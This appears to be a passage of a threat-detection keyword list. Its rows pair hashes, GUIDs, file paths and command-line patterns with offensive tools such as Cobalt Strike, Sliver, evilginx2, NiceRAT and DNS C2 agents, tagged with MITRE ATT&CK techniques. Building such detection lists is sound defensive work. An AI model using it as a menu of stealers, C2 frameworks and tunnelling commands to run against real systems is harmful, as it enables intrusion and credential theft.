"*aeachknmefphepccionboohckonoeemg*",".{0,1000}aeachknmefphepccionboohckonoeemg.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AEC32155-D589-4150-8FE7-2900DF4554C8*",".{0,1000}AEC32155\-D589\-4150\-8FE7\-2900DF4554C8.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69*",".{0,1000}aec7b9f5d2bf5b9ae363fce9c7426bf03a08271f1f7ea1bba4bc5e05f717ac69.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64*",".{0,1000}aee357b11515032187ff5c1d295b03b955a5198b1828cb7d3fa3f83687b41d64.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09*",".{0,1000}aeebbc6ea13dde53ffa47ec90eb80c571c81da63e36f2c8539a9924f54933a09.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aem2john.py*",".{0,1000}aem2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AES_cryptor.py *",".{0,1000}AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*AesEncryptor.py*",".{0,1000}AesEncryptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23*",".{0,1000}af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*af2d9062b7788fc47385d8c6c645dfa0*",".{0,1000}af2d9062b7788fc47385d8c6c645dfa0.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*",".{0,1000}AF9C62A1\-F8D2\-4BE0\-B019\-0A7873E81EA9.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25*",".{0,1000}afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*afbcbjpbpfadlkmhmclhkeeodmamcflc*",".{0,1000}afbcbjpbpfadlkmhmclhkeeodmamcflc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd*",".{0,1000}afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d*",".{0,1000}afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8*",".{0,1000}afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d*",".{0,1000}afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187*",".{0,1000}affa24f6e1fd339093365bfce238b94ec6948d4d1c401fc7dffc4921e9da0187.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*ag_load_script*",".{0,1000}ag_load_script.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*agent*DNSCommunication.cpp*",".{0,1000}agent.{0,1000}DNSCommunication\.cpp.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*agent.exe -dns -srvhost *",".{0,1000}agent\.exe\s\-dns\s\-srvhost\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "*agent.exe -lhost * -reuse-port *",".{0,1000}agent\.exe\s\-lhost\s.{0,1000}\s\-reuse\-port\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agent/cmd_download_files.*",".{0,1000}agent\/cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_exec.*",".{0,1000}agent\/cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_kill.*",".{0,1000}agent\/cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_proxy.*",".{0,1000}agent\/cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_run.c*",".{0,1000}agent\/cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_shell.*",".{0,1000}agent\/cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_sleep.*",".{0,1000}agent\/cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_sysinfo.c*",".{0,1000}agent\/cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/cmd_upload_files.*",".{0,1000}agent\/cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent/dll.nim*",".{0,1000}agent\/dll\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*agent/elf.nim*",".{0,1000}agent\/elf\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*agent/exe.nim*",".{0,1000}agent\/exe\.nim.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Agent/ratchatPT.go*",".{0,1000}Agent\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*agent\cmd_download_files.*",".{0,1000}agent\\cmd_download_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_exec.*",".{0,1000}agent\\cmd_exec\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_kill.*",".{0,1000}agent\\cmd_kill\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_proxy.*",".{0,1000}agent\\cmd_proxy\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_run.c*",".{0,1000}agent\\cmd_run\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_shell.*",".{0,1000}agent\\cmd_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_sleep.*",".{0,1000}agent\\cmd_sleep\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_sysinfo.c*",".{0,1000}agent\\cmd_sysinfo\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent\cmd_upload_files.*",".{0,1000}agent\\cmd_upload_files\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent_code/bash_executor*",".{0,1000}agent_code\/bash_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","42","9","2024-03-10T19:25:46Z","2022-09-28T17:20:04Z" "*agent_dll.dll*",".{0,1000}agent_dll\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*agent_linux_x64 -lport *",".{0,1000}agent_linux_x64\s\-lport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agent_linux_x64 -rhost * -rport *",".{0,1000}agent_linux_x64\s\-rhost\s.{0,1000}\s\-rport\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*agents/Follina-2*",".{0,1000}agents\/Follina\-2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AggressiveProxy.cna*",".{0,1000}AggressiveProxy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*aggressor.beacons*",".{0,1000}aggressor\.beacons.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*aggressor.bshell*",".{0,1000}aggressor\.bshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 